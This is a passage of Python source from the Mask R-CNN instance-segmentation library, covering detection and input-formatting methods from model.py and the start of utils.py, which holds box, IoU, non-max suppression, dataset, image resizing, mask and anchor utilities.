workers=workers, use_multiprocessing=True, ) self.epoch = max(self.epoch, epochs) def mold_inputs(self, images): """Takes a list of images and modifies them to the format expected as an input to the neural network. images: List of image matrices [height,width,depth]. Images can have different sizes. Returns 3 Numpy matrices: molded_images: [N, h, w, 3]. Images resized and normalized. image_metas: [N, length of meta data]. Details about each image. windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the original image (padding excluded). """ molded_images = [] image_metas = [] windows = [] for image in images: # Resize image # TODO: move resizing to mold_image() molded_image, window, scale, padding, crop = utils.resize_image( image, min_dim=self.config.IMAGE_MIN_DIM, min_scale=self.config.IMAGE_MIN_SCALE, max_dim=self.config.IMAGE_MAX_DIM, mode=self.config.IMAGE_RESIZE_MODE) molded_image = mold_image(molded_image, self.config) # Build image_meta image_meta = compose_image_meta( 0, image.shape, molded_image.shape, window, scale, np.zeros([self.config.NUM_CLASSES], dtype=np.int32)) # Append molded_images.append(molded_image) windows.append(window) image_metas.append(image_meta) # Pack into arrays molded_images = np.stack(molded_images) image_metas = np.stack(image_metas) windows = np.stack(windows) return molded_images, image_metas, windows def unmold_detections(self, detections, mrcnn_mask, original_image_shape, image_shape, window): """Reformats the detections of one image from the format of the neural network output to a format suitable for use in the rest of the application. detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates mrcnn_mask: [N, height, width, num_classes] original_image_shape: [H, W, C] Original image shape before resizing image_shape: [H, W, C] Shape of the image after resizing and padding window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real image is excluding the padding. Returns: boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels class_ids: [N] Integer class IDs for each bounding box scores: [N] Float probability scores of the class_id masks: [height, width, num_instances] Instance masks """ # How many detections do we have? # Detections array is padded with zeros. Find the first class_id == 0. zero_ix = np.where(detections[:, 4] == 0)[0] N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0] # Extract boxes, class_ids, scores, and class-specific masks boxes = detections[:N, :4] class_ids = detections[:N, 4].astype(np.int32) scores = detections[:N, 5] masks = mrcnn_mask[np.arange(N), :, :, class_ids] # Translate normalized coordinates in the resized image to pixel # coordinates in the original image before resizing window = utils.norm_boxes(window, image_shape[:2]) wy1, wx1, wy2, wx2 = window shift = np.array([wy1, wx1, wy1, wx1]) wh = wy2 - wy1 # window height ww = wx2 - wx1 # window width scale = np.array([wh, ww, wh, ww]) # Convert boxes to normalized coordinates on the window boxes = np.divide(boxes - shift, scale) # Convert boxes to pixel coordinates on the original image boxes = utils.denorm_boxes(boxes, original_image_shape[:2]) # Filter out detections with zero area. Happens in early training when # network weights are still random exclude_ix = np.where( (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0] if exclude_ix.shape[0] > 0: boxes = np.delete(boxes, exclude_ix, axis=0) class_ids = np.delete(class_ids, exclude_ix, axis=0) scores = np.delete(scores, exclude_ix, axis=0) masks = np.delete(masks, exclude_ix, axis=0) N = class_ids.shape[0] # Resize masks to original image size and set boundary threshold. full_masks = [] for i in range(N): # Convert neural network mask to full size mask full_mask = utils.unmold_mask(masks[i], boxes[i], original_image_shape) full_masks.append(full_mask) full_masks = np.stack(full_masks, axis=-1)\ if full_masks else np.empty(original_image_shape[:2] + (0,)) return boxes, class_ids, scores, full_masks def detect(self, images, verbose=0): """Runs the detection pipeline. images: List of images, potentially of different sizes. Returns a list of dicts, one dict per image. The dict contains: rois: [N, (y1, x1, y2, x2)] detection bounding boxes class_ids: [N] int class IDs scores: [N] float probability scores for the class IDs masks: [H, W, N] instance binary masks """ assert self.mode == "inference", "Create model in inference mode." assert len( images) == self.config.BATCH_SIZE, "len(images) must be equal to BATCH_SIZE" if verbose: log("Processing {} images".format(len(images))) for image in images: log("image", image) # Mold inputs to format expected by the neural network molded_images, image_metas, windows = self.mold_inputs(images) # Validate image sizes # All images in a batch MUST be of the same size image_shape = molded_images[0].shape for g in molded_images[1:]: assert g.shape == image_shape,\ "After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes." # Anchors anchors = self.get_anchors(image_shape) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape) if verbose: log("molded_images", molded_images) log("image_metas", image_metas) log("anchors", anchors) # Run object detection detections, _, _, mrcnn_mask, _, _, _ =\ self.keras_model.predict([molded_images, image_metas, anchors], verbose=0) # Process detections results = [] for i, image in enumerate(images): final_rois, final_class_ids, final_scores, final_masks =\ self.unmold_detections(detections[i], mrcnn_mask[i], image.shape, molded_images[i].shape, windows[i]) results.append({ "rois": final_rois, "class_ids": final_class_ids, "scores": final_scores, "masks": final_masks, }) return results def detect_molded(self, molded_images, image_metas, verbose=0): """Runs the detection pipeline, but expect inputs that are molded already. Used mostly for debugging and inspecting the model. molded_images: List of images loaded using load_image_gt() image_metas: image meta data, also returned by load_image_gt() Returns a list of dicts, one dict per image. The dict contains: rois: [N, (y1, x1, y2, x2)] detection bounding boxes class_ids: [N] int class IDs scores: [N] float probability scores for the class IDs masks: [H, W, N] instance binary masks """ assert self.mode == "inference", "Create model in inference mode." assert len(molded_images) == self.config.BATCH_SIZE,\ "Number of images must be equal to BATCH_SIZE" if verbose: log("Processing {} images".format(len(molded_images))) for image in molded_images: log("image", image) # Validate image sizes # All images in a batch MUST be of the same size image_shape = molded_images[0].shape for g in molded_images[1:]: assert g.shape == image_shape, "Images must have the same size" # Anchors anchors = self.get_anchors(image_shape) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape) if verbose: log("molded_images", molded_images) log("image_metas", image_metas) log("anchors", anchors) # Run object detection detections, _, _, mrcnn_mask, _, _, _ =\ self.keras_model.predict([molded_images, image_metas, anchors], verbose=0) # Process detections results = [] for i, image in enumerate(molded_images): window = [0, 0, image.shape[0], image.shape[1]] final_rois, final_class_ids, final_scores, final_masks =\ self.unmold_detections(detections[i], mrcnn_mask[i], image.shape, molded_images[i].shape, window) results.append({ "rois": final_rois, "class_ids": final_class_ids, "scores": final_scores, "masks": final_masks, }) return results def get_anchors(self, image_shape): """Returns anchor pyramid for the given image size.""" backbone_shapes = compute_backbone_shapes(self.config, image_shape) # Cache anchors and reuse if image shape is the same if not hasattr(self, "_anchor_cache"): self._anchor_cache = {} if not tuple(image_shape) in self._anchor_cache: # Generate Anchors a = utils.generate_pyramid_anchors( self.config.RPN_ANCHOR_SCALES, self.config.RPN_ANCHOR_RATIOS, backbone_shapes, self.config.BACKBONE_STRIDES, self.config.RPN_ANCHOR_STRIDE) # Keep a copy of the latest anchors in pixel coordinates because # it's used in inspect_model notebooks. # TODO: Remove this after the notebook are refactored to not use it self.anchors = a # Normalize coordinates self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2]) return self._anchor_cache[tuple(image_shape)] def ancestor(self, tensor, name, checked=None): """Finds the ancestor of a TF tensor in the computation graph. tensor: TensorFlow symbolic tensor. name: Name of ancestor tensor to find checked: For internal use. A list of tensors that were already searched to avoid loops in traversing the graph. """ checked = checked if checked is not None else [] # Put a limit on how deep we go to avoid very long loops if len(checked) > 500: return None # Convert name to a regex and allow matching a number prefix # because Keras adds them automatically if isinstance(name, str): name = re.compile(name.replace("/", r"(\_\d+)*/")) parents = tensor.op.inputs for p in parents: if p in checked: continue if bool(re.fullmatch(name, p.name)): return p checked.append(p) a = self.ancestor(p, name, checked) if a is not None: return a return None def find_trainable_layer(self, layer): """If a layer is encapsulated by another layer, this function digs through the encapsulation and returns the layer that holds the weights. """ if layer.__class__.__name__ == 'TimeDistributed': return self.find_trainable_layer(layer.layer) return layer def get_trainable_layers(self): """Returns a list of layers that have weights.""" layers = [] # Loop through all layers for l in self.keras_model.layers: # If layer is a wrapper, find inner trainable layer l = self.find_trainable_layer(l) # Include layer if it has weights if l.get_weights(): layers.append(l) return layers def run_graph(self, images, outputs, image_metas=None): """Runs a sub-set of the computation graph that computes the given outputs. image_metas: If provided, the images are assumed to be already molded (i.e. resized, padded, and normalized) outputs: List of tuples (name, tensor) to compute. The tensors are symbolic TensorFlow tensors and the names are for easy tracking. Returns an ordered dict of results. Keys are the names received in the input and values are Numpy arrays. """ model = self.keras_model # Organize desired outputs into an ordered dict outputs = OrderedDict(outputs) for o in outputs.values(): assert o is not None # Build a Keras function to run parts of the computation graph inputs = model.inputs if model.uses_learning_phase and not isinstance(K.learning_phase(), int): inputs += [K.learning_phase()] kf = K.function(model.inputs, list(outputs.values())) # Prepare inputs if image_metas is None: molded_images, image_metas, _ = self.mold_inputs(images) else: molded_images = images image_shape = molded_images[0].shape # Anchors anchors = self.get_anchors(image_shape) # Duplicate across the batch dimension because Keras requires it # TODO: can this be optimized to avoid duplicating the anchors? anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape) model_in = [molded_images, image_metas, anchors] # Run inference if model.uses_learning_phase and not isinstance(K.learning_phase(), int): model_in.append(0.) outputs_np = kf(model_in) # Pack the generated Numpy arrays into a a dict and log the results. outputs_np = OrderedDict([(k, v) for k, v in zip(outputs.keys(), outputs_np)]) for k, v in outputs_np.items(): log(k, v) return outputs_np ############################################################ # Data Formatting ############################################################ def compose_image_meta(image_id, original_image_shape, image_shape, window, scale, active_class_ids): """Takes attributes of an image and puts them in one 1D array. image_id: An int ID of the image. Useful for debugging. original_image_shape: [H, W, C] before resizing or padding. image_shape: [H, W, C] after resizing and padding window: (y1, x1, y2, x2) in pixels. The area of the image where the real image is (excluding the padding) scale: The scaling factor applied to the original image (float32) active_class_ids: List of class_ids available in the dataset from which the image came. Useful if training on images from multiple datasets where not all classes are present in all datasets. """ meta = np.array( [image_id] + # size=1 list(original_image_shape) + # size=3 list(image_shape) + # size=3 list(window) + # size=4 (y1, x1, y2, x2) in image cooredinates [scale] + # size=1 list(active_class_ids) # size=num_classes ) return meta def parse_image_meta(meta): """Parses an array that contains image attributes to its components. See compose_image_meta() for more details. meta: [batch, meta length] where meta length depends on NUM_CLASSES Returns a dict of the parsed values. """ image_id = meta[:, 0] original_image_shape = meta[:, 1:4] image_shape = meta[:, 4:7] window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels scale = meta[:, 11] active_class_ids = meta[:, 12:] return { "image_id": image_id.astype(np.int32), "original_image_shape": original_image_shape.astype(np.int32), "image_shape": image_shape.astype(np.int32), "window": window.astype(np.int32), "scale": scale.astype(np.float32), "active_class_ids": active_class_ids.astype(np.int32), } def parse_image_meta_graph(meta): """Parses a tensor that contains image attributes to its components. See compose_image_meta() for more details. meta: [batch, meta length] where meta length depends on NUM_CLASSES Returns a dict of the parsed tensors. """ image_id = meta[:, 0] original_image_shape = meta[:, 1:4] image_shape = meta[:, 4:7] window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels scale = meta[:, 11] active_class_ids = meta[:, 12:] return { "image_id": image_id, "original_image_shape": original_image_shape, "image_shape": image_shape, "window": window, "scale": scale, "active_class_ids": active_class_ids, } def mold_image(images, config): """Expects an RGB image (or array of images) and subtracts the mean pixel and converts it to float. Expects image colors in RGB order. """ return images.astype(np.float32) - config.MEAN_PIXEL def unmold_image(normalized_images, config): """Takes a image normalized with mold() and returns the original.""" return (normalized_images + config.MEAN_PIXEL).astype(np.uint8) ############################################################ # Miscellenous Graph Functions ############################################################ def trim_zeros_graph(boxes, name='trim_zeros'): """Often boxes are represented with matrices of shape [N, 4] and are padded with zeros. This removes zero boxes. boxes: [N, 4] matrix of boxes. non_zeros: [N] a 1D boolean mask identifying the rows to keep """ non_zeros = tf.cast(tf.reduce_sum(tf.abs(boxes), axis=1), tf.bool) boxes = tf.boolean_mask(boxes, non_zeros, name=name) return boxes, non_zeros def batch_pack_graph(x, counts, num_rows): """Picks different number of values from each row in x depending on the values in counts. """ outputs = [] for i in range(num_rows): outputs.append(x[i, :counts[i]]) return tf.concat(outputs, axis=0) def norm_boxes_graph(boxes, shape): """Converts boxes from pixel coordinates to normalized coordinates. boxes: [..., (y1, x1, y2, x2)] in pixel coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [..., (y1, x1, y2, x2)] in normalized coordinates """ h, w = tf.split(tf.cast(shape, tf.float32), 2) scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0) shift = tf.constant([0., 0., 1., 1.]) return tf.divide(boxes - shift, scale) def denorm_boxes_graph(boxes, shape): """Converts boxes from normalized coordinates to pixel coordinates. boxes: [..., (y1, x1, y2, x2)] in normalized coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [..., (y1, x1, y2, x2)] in pixel coordinates """ h, w = tf.split(tf.cast(shape, tf.float32), 2) scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0) shift = tf.constant([0., 0., 1., 1.]) return tf.cast(tf.round(tf.multiply(boxes, scale) + shift), tf.int32) File: mrcnn/utils.py """ Mask R-CNN Common utility functions and classes. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import sys import os import logging import math import random import numpy as np import tensorflow as tf import scipy import skimage.color import skimage.io import skimage.transform import urllib.request import shutil import warnings from distutils.version import LooseVersion # URL from which to download the latest COCO trained weights COCO_MODEL_URL = "https://github.com/matterport/Mask_RCNN/releases/download/v2.0/mask_rcnn_coco.h5" ############################################################ # Bounding Boxes ############################################################ def extract_bboxes(mask): """Compute bounding boxes from masks. mask: [height, width, num_instances]. Mask pixels are either 1 or 0. Returns: bbox array [num_instances, (y1, x1, y2, x2)]. """ boxes = np.zeros([mask.shape[-1], 4], dtype=np.int32) for i in range(mask.shape[-1]): m = mask[:, :, i] # Bounding box. horizontal_indicies = np.where(np.any(m, axis=0))[0] vertical_indicies = np.where(np.any(m, axis=1))[0] if horizontal_indicies.shape[0]: x1, x2 = horizontal_indicies[[0, -1]] y1, y2 = vertical_indicies[[0, -1]] # x2 and y2 should not be part of the box. Increment by 1. x2 += 1 y2 += 1 else: # No mask for this instance. Might happen due to # resizing or cropping. Set bbox to zeros x1, x2, y1, y2 = 0, 0, 0, 0 boxes[i] = np.array([y1, x1, y2, x2]) return boxes.astype(np.int32) def compute_iou(box, boxes, box_area, boxes_area): """Calculates IoU of the given box with the array of the given boxes. box: 1D vector [y1, x1, y2, x2] boxes: [boxes_count, (y1, x1, y2, x2)] box_area: float. the area of 'box' boxes_area: array of length boxes_count. Note: the areas are passed in rather than calculated here for efficiency. Calculate once in the caller to avoid duplicate work. """ # Calculate intersection areas y1 = np.maximum(box[0], boxes[:, 0]) y2 = np.minimum(box[2], boxes[:, 2]) x1 = np.maximum(box[1], boxes[:, 1]) x2 = np.minimum(box[3], boxes[:, 3]) intersection = np.maximum(x2 - x1, 0) * np.maximum(y2 - y1, 0) union = box_area + boxes_area[:] - intersection[:] iou = intersection / union return iou def compute_overlaps(boxes1, boxes2): """Computes IoU overlaps between two sets of boxes. boxes1, boxes2: [N, (y1, x1, y2, x2)]. For better performance, pass the largest set first and the smaller second. """ # Areas of anchors and GT boxes area1 = (boxes1[:, 2] - boxes1[:, 0]) * (boxes1[:, 3] - boxes1[:, 1]) area2 = (boxes2[:, 2] - boxes2[:, 0]) * (boxes2[:, 3] - boxes2[:, 1]) # Compute overlaps to generate matrix [boxes1 count, boxes2 count] # Each cell contains the IoU value. overlaps = np.zeros((boxes1.shape[0], boxes2.shape[0])) for i in range(overlaps.shape[1]): box2 = boxes2[i] overlaps[:, i] = compute_iou(box2, boxes1, area2[i], area1) return overlaps def compute_overlaps_masks(masks1, masks2): """Computes IoU overlaps between two sets of masks. masks1, masks2: [Height, Width, instances] """ # If either set of masks is empty return empty result if masks1.shape[-1] == 0 or masks2.shape[-1] == 0: return np.zeros((masks1.shape[-1], masks2.shape[-1])) # flatten masks and compute their areas masks1 = np.reshape(masks1 > .5, (-1, masks1.shape[-1])).astype(np.float32) masks2 = np.reshape(masks2 > .5, (-1, masks2.shape[-1])).astype(np.float32) area1 = np.sum(masks1, axis=0) area2 = np.sum(masks2, axis=0) # intersections and union intersections = np.dot(masks1.T, masks2) union = area1[:, None] + area2[None, :] - intersections overlaps = intersections / union return overlaps def non_max_suppression(boxes, scores, threshold): """Performs non-maximum suppression and returns indices of kept boxes. boxes: [N, (y1, x1, y2, x2)]. Notice that (y2, x2) lays outside the box. scores: 1-D array of box scores. threshold: Float. IoU threshold to use for filtering. """ assert boxes.shape[0] > 0 if boxes.dtype.kind != "f": boxes = boxes.astype(np.float32) # Compute box areas y1 = boxes[:, 0] x1 = boxes[:, 1] y2 = boxes[:, 2] x2 = boxes[:, 3] area = (y2 - y1) * (x2 - x1) # Get indicies of boxes sorted by scores (highest first) ixs = scores.argsort()[::-1] pick = [] while len(ixs) > 0: # Pick top box and add its index to the list i = ixs[0] pick.append(i) # Compute IoU of the picked box with the rest iou = compute_iou(boxes[i], boxes[ixs[1:]], area[i], area[ixs[1:]]) # Identify boxes with IoU over the threshold. This # returns indices into ixs[1:], so add 1 to get # indices into ixs. remove_ixs = np.where(iou > threshold)[0] + 1 # Remove indices of the picked and overlapped boxes. ixs = np.delete(ixs, remove_ixs) ixs = np.delete(ixs, 0) return np.array(pick, dtype=np.int32) def apply_box_deltas(boxes, deltas): """Applies the given deltas to the given boxes. boxes: [N, (y1, x1, y2, x2)]. Note that (y2, x2) is outside the box. deltas: [N, (dy, dx, log(dh), log(dw))] """ boxes = boxes.astype(np.float32) # Convert to y, x, h, w height = boxes[:, 2] - boxes[:, 0] width = boxes[:, 3] - boxes[:, 1] center_y = boxes[:, 0] + 0.5 * height center_x = boxes[:, 1] + 0.5 * width # Apply deltas center_y += deltas[:, 0] * height center_x += deltas[:, 1] * width height *= np.exp(deltas[:, 2]) width *= np.exp(deltas[:, 3]) # Convert back to y1, x1, y2, x2 y1 = center_y - 0.5 * height x1 = center_x - 0.5 * width y2 = y1 + height x2 = x1 + width return np.stack([y1, x1, y2, x2], axis=1) def box_refinement_graph(box, gt_box): """Compute refinement needed to transform box to gt_box. box and gt_box are [N, (y1, x1, y2, x2)] """ box = tf.cast(box, tf.float32) gt_box = tf.cast(gt_box, tf.float32) height = box[:, 2] - box[:, 0] width = box[:, 3] - box[:, 1] center_y = box[:, 0] + 0.5 * height center_x = box[:, 1] + 0.5 * width gt_height = gt_box[:, 2] - gt_box[:, 0] gt_width = gt_box[:, 3] - gt_box[:, 1] gt_center_y = gt_box[:, 0] + 0.5 * gt_height gt_center_x = gt_box[:, 1] + 0.5 * gt_width dy = (gt_center_y - center_y) / height dx = (gt_center_x - center_x) / width dh = tf.log(gt_height / height) dw = tf.log(gt_width / width) result = tf.stack([dy, dx, dh, dw], axis=1) return result def box_refinement(box, gt_box): """Compute refinement needed to transform box to gt_box. box and gt_box are [N, (y1, x1, y2, x2)]. (y2, x2) is assumed to be outside the box. """ box = box.astype(np.float32) gt_box = gt_box.astype(np.float32) height = box[:, 2] - box[:, 0] width = box[:, 3] - box[:, 1] center_y = box[:, 0] + 0.5 * height center_x = box[:, 1] + 0.5 * width gt_height = gt_box[:, 2] - gt_box[:, 0] gt_width = gt_box[:, 3] - gt_box[:, 1] gt_center_y = gt_box[:, 0] + 0.5 * gt_height gt_center_x = gt_box[:, 1] + 0.5 * gt_width dy = (gt_center_y - center_y) / height dx = (gt_center_x - center_x) / width dh = np.log(gt_height / height) dw = np.log(gt_width / width) return np.stack([dy, dx, dh, dw], axis=1) ############################################################ # Dataset ############################################################ class Dataset(object): """The base class for dataset classes. To use it, create a new class that adds functions specific to the dataset you want to use. For example: class CatsAndDogsDataset(Dataset): def load_cats_and_dogs(self): ... def load_mask(self, image_id): ... def image_reference(self, image_id): ... See COCODataset and ShapesDataset as examples. """ def __init__(self, class_map=None): self._image_ids = [] self.image_info = [] # Background is always the first class self.class_info = [{"source": "", "id": 0, "name": "BG"}] self.source_class_ids = {} def add_class(self, source, class_id, class_name): assert "." not in source, "Source name cannot contain a dot" # Does the class exist already? for info in self.class_info: if info['source'] == source and info["id"] == class_id: # source.class_id combination already available, skip return # Add the class self.class_info.append({ "source": source, "id": class_id, "name": class_name, }) def add_image(self, source, image_id, path, **kwargs): image_info = { "id": image_id, "source": source, "path": path, } image_info.update(kwargs) self.image_info.append(image_info) def image_reference(self, image_id): """Return a link to the image in its source Website or details about the image that help looking it up or debugging it. Override for your dataset, but pass to this function if you encounter images not in your dataset. """ return "" def prepare(self, class_map=None): """Prepares the Dataset class for use. TODO: class map is not supported yet. When done, it should handle mapping classes from different datasets to the same class ID. """ def clean_name(name): """Returns a shorter version of object names for cleaner display.""" return ",".join(name.split(",")[:1]) # Build (or rebuild) everything else from the info dicts. self.num_classes = len(self.class_info) self.class_ids = np.arange(self.num_classes) self.class_names = [clean_name(c["name"]) for c in self.class_info] self.num_images = len(self.image_info) self._image_ids = np.arange(self.num_images) # Mapping from source class and image IDs to internal IDs self.class_from_source_map = {"{}.{}".format(info['source'], info['id']): id for info, id in zip(self.class_info, self.class_ids)} self.image_from_source_map = {"{}.{}".format(info['source'], info['id']): id for info, id in zip(self.image_info, self.image_ids)} # Map sources to class_ids they support self.sources = list(set([i['source'] for i in self.class_info])) self.source_class_ids = {} # Loop over datasets for source in self.sources: self.source_class_ids[source] = [] # Find classes that belong to this dataset for i, info in enumerate(self.class_info): # Include BG class in all datasets if i == 0 or source == info['source']: self.source_class_ids[source].append(i) def map_source_class_id(self, source_class_id): """Takes a source class ID and returns the int class ID assigned to it. For example: dataset.map_source_class_id("coco.12") -> 23 """ return self.class_from_source_map[source_class_id] def get_source_class_id(self, class_id, source): """Map an internal class ID to the corresponding class ID in the source dataset.""" info = self.class_info[class_id] assert info['source'] == source return info['id'] @property def image_ids(self): return self._image_ids def source_image_link(self, image_id): """Returns the path or URL to the image. Override this to return a URL to the image if it's available online for easy debugging. """ return self.image_info[image_id]["path"] def load_image(self, image_id): """Load the specified image and return a [H,W,3] Numpy array. """ # Load image image = skimage.io.imread(self.image_info[image_id]['path']) # If grayscale. Convert to RGB for consistency. if image.ndim != 3: image = skimage.color.gray2rgb(image) # If has an alpha channel, remove it for consistency if image.shape[-1] == 4: image = image[..., :3] return image def load_mask(self, image_id): """Load instance masks for the given image. Different datasets use different ways to store masks. Override this method to load instance masks and return them in the form of am array of binary masks of shape [height, width, instances]. Returns: masks: A bool array of shape [height, width, instance count] with a binary mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ # Override this function to load a mask from your dataset. # Otherwise, it returns an empty mask. logging.warning("You are using the default load_mask(), maybe you need to define your own one.") mask = np.empty([0, 0, 0]) class_ids = np.empty([0], np.int32) return mask, class_ids def resize_image(image, min_dim=None, max_dim=None, min_scale=None, mode="square"): """Resizes an image keeping the aspect ratio unchanged. min_dim: if provided, resizes the image such that it's smaller dimension == min_dim max_dim: if provided, ensures that the image longest side doesn't exceed this value. min_scale: if provided, ensure that the image is scaled up by at least this percent even if min_dim doesn't require it. mode: Resizing mode. none: No resizing. Return the image unchanged. square: Resize and pad with zeros to get a square image of size [max_dim, max_dim]. pad64: Pads width and height with zeros to make them multiples of 64. If min_dim or min_scale are provided, it scales the image up before padding. max_dim is ignored in this mode. The multiple of 64 is needed to ensure smooth scaling of feature maps up and down the 6 levels of the FPN pyramid (2**6=64). crop: Picks random crops from the image. First, scales the image based on min_dim and min_scale, then picks a random crop of size min_dim x min_dim. Can be used in training only. max_dim is not used in this mode. Returns: image: the resized image window: (y1, x1, y2, x2). If max_dim is provided, padding might be inserted in the returned image. If so, this window is the coordinates of the image part of the full image (excluding the padding). The x2, y2 pixels are not included. scale: The scale factor used to resize the image padding: Padding added to the image [(top, bottom), (left, right), (0, 0)] """ # Keep track of image dtype and return results in the same dtype image_dtype = image.dtype # Default window (y1, x1, y2, x2) and default scale == 1. h, w = image.shape[:2] window = (0, 0, h, w) scale = 1 padding = [(0, 0), (0, 0), (0, 0)] crop = None if mode == "none": return image, window, scale, padding, crop # Scale? if min_dim: # Scale up but not down scale = max(1, min_dim / min(h, w)) if min_scale and scale < min_scale: scale = min_scale # Does it exceed max dim? if max_dim and mode == "square": image_max = max(h, w) if round(image_max * scale) > max_dim: scale = max_dim / image_max # Resize image using bilinear interpolation if scale != 1: image = resize(image, (round(h * scale), round(w * scale)), preserve_range=True) # Need padding or cropping? if mode == "square": # Get new height and width h, w = image.shape[:2] top_pad = (max_dim - h) // 2 bottom_pad = max_dim - h - top_pad left_pad = (max_dim - w) // 2 right_pad = max_dim - w - left_pad padding = [(top_pad, bottom_pad), (left_pad, right_pad), (0, 0)] image = np.pad(image, padding, mode='constant', constant_values=0) window = (top_pad, left_pad, h + top_pad, w + left_pad) elif mode == "pad64": h, w = image.shape[:2] # Both sides must be divisible by 64 assert min_dim % 64 == 0, "Minimum dimension must be a multiple of 64" # Height if h % 64 > 0: max_h = h - (h % 64) + 64 top_pad = (max_h - h) // 2 bottom_pad = max_h - h - top_pad else: top_pad = bottom_pad = 0 # Width if w % 64 > 0: max_w = w - (w % 64) + 64 left_pad = (max_w - w) // 2 right_pad = max_w - w - left_pad else: left_pad = right_pad = 0 padding = [(top_pad, bottom_pad), (left_pad, right_pad), (0, 0)] image = np.pad(image, padding, mode='constant', constant_values=0) window = (top_pad, left_pad, h + top_pad, w + left_pad) elif mode == "crop": # Pick a random crop h, w = image.shape[:2] y = random.randint(0, (h - min_dim)) x = random.randint(0, (w - min_dim)) crop = (y, x, min_dim, min_dim) image = image[y:y + min_dim, x:x + min_dim] window = (0, 0, min_dim, min_dim) else: raise Exception("Mode {} not supported".format(mode)) return image.astype(image_dtype), window, scale, padding, crop def resize_mask(mask, scale, padding, crop=None): """Resizes a mask using the given scale and padding. Typically, you get the scale and padding from resize_image() to ensure both, the image and the mask, are resized consistently. scale: mask scaling factor padding: Padding to add to the mask in the form [(top, bottom), (left, right), (0, 0)] """ # Suppress warning from scipy 0.13.0, the output shape of zoom() is # calculated with round() instead of int() with warnings.catch_warnings(): warnings.simplefilter("ignore") mask = scipy.ndimage.zoom(mask, zoom=[scale, scale, 1], order=0) if crop is not None: y, x, h, w = crop mask = mask[y:y + h, x:x + w] else: mask = np.pad(mask, padding, mode='constant', constant_values=0) return mask def minimize_mask(bbox, mask, mini_shape): """Resize masks to a smaller version to reduce memory load. Mini-masks can be resized back to image scale using expand_masks() See inspect_data.ipynb notebook for more details. """ mini_mask = np.zeros(mini_shape + (mask.shape[-1],), dtype=bool) for i in range(mask.shape[-1]): # Pick slice and cast to bool in case load_mask() returned wrong dtype m = mask[:, :, i].astype(bool) y1, x1, y2, x2 = bbox[i][:4] m = m[y1:y2, x1:x2] if m.size == 0: raise Exception("Invalid bounding box with area of zero") # Resize with bilinear interpolation m = resize(m, mini_shape) mini_mask[:, :, i] = np.around(m).astype(np.bool) return mini_mask def expand_mask(bbox, mini_mask, image_shape): """Resizes mini masks back to image size. Reverses the change of minimize_mask(). See inspect_data.ipynb notebook for more details. """ mask = np.zeros(image_shape[:2] + (mini_mask.shape[-1],), dtype=bool) for i in range(mask.shape[-1]): m = mini_mask[:, :, i] y1, x1, y2, x2 = bbox[i][:4] h = y2 - y1 w = x2 - x1 # Resize with bilinear interpolation m = resize(m, (h, w)) mask[y1:y2, x1:x2, i] = np.around(m).astype(np.bool) return mask # TODO: Build and use this function to reduce code duplication def mold_mask(mask, config): pass def unmold_mask(mask, bbox, image_shape): """Converts a mask generated by the neural network to a format similar to its original shape. mask: [height, width] of type float. A small, typically 28x28 mask. bbox: [y1, x1, y2, x2]. The box to fit the mask in. Returns a binary mask with the same size as the original image. """ threshold = 0.5 y1, x1, y2, x2 = bbox mask = resize(mask, (y2 - y1, x2 - x1)) mask = np.where(mask >= threshold, 1, 0).astype(np.bool) # Put the mask in the right location. full_mask = np.zeros(image_shape[:2], dtype=np.bool) full_mask[y1:y2, x1:x2] = mask return full_mask ############################################################ # Anchors ############################################################ def generate_anchors(scales, ratios, shape, feature_stride, anchor_stride): """ scales: 1D array of anchor sizes in pixels. Example: [32, 64, 128] ratios: 1D array of anchor ratios of width/height. Example: [0.5, 1, 2] shape: [height, width] spatial shape of the feature map over which to generate anchors. feature_stride: Stride of the feature map relative to the image in pixels. anchor_stride: Stride of anchors on the feature map. For example, if the value is 2 then generate anchors for every other feature map pixel. """ # Get all combinations of scales and ratios scales, ratios = np.meshgrid(np.array(scales), np.array(ratios)) scales = scales.flatten() ratios = ratios.flatten() # Enumerate heights and widths from scales and ratios heights = scales / np.sqrt(ratios) widths = scales * np.sqrt(ratios) # Enumerate shifts in feature space shifts_y = np.arange(0, shape[0], anchor_stride) * feature_stride shifts_x = np.arange(0, shape[1], anchor_stride) * feature_stride shifts_x, shifts_y = np.meshgrid(shifts_x, shifts_y) # Enumerate combinations of shifts, widths, and heights box_widths, box_centers_x = np.meshgrid(widths, shifts_x) box_heights, box_centers_y = np.meshgrid(heights, shifts_y) # Reshape to get a list of (y, x) and a list of (h, w) box_centers = np.stack( [box_centers_y, box_centers_x], axis=2).reshape([-1, 2]) box_sizes = np.stack([box_heights, box_widths], axis=2).reshape([-1, 2]) # Convert to corner coordinates (y1, x1, y2, x2) boxes = np.concatenate([box_centers - 0.5 * box_sizes, box_centers + 0.5 * box_sizes], axis=1) return boxes def generate_pyramid_anchors(scales, ratios, feature_shapes, feature_strides, anchor_stride): """Generate anchors at different levels of a feature pyramid. Each scale is associated with a level of the pyramid, but each ratio is used in all levels of the pyramid. Returns: anchors: [N, (y1, x1, y2, x2)]. All generated anchors in one array. Sorted with the same order of the given scales. So, anchors of scale[0] come first, then anchors of scale[1], and so on. """ # 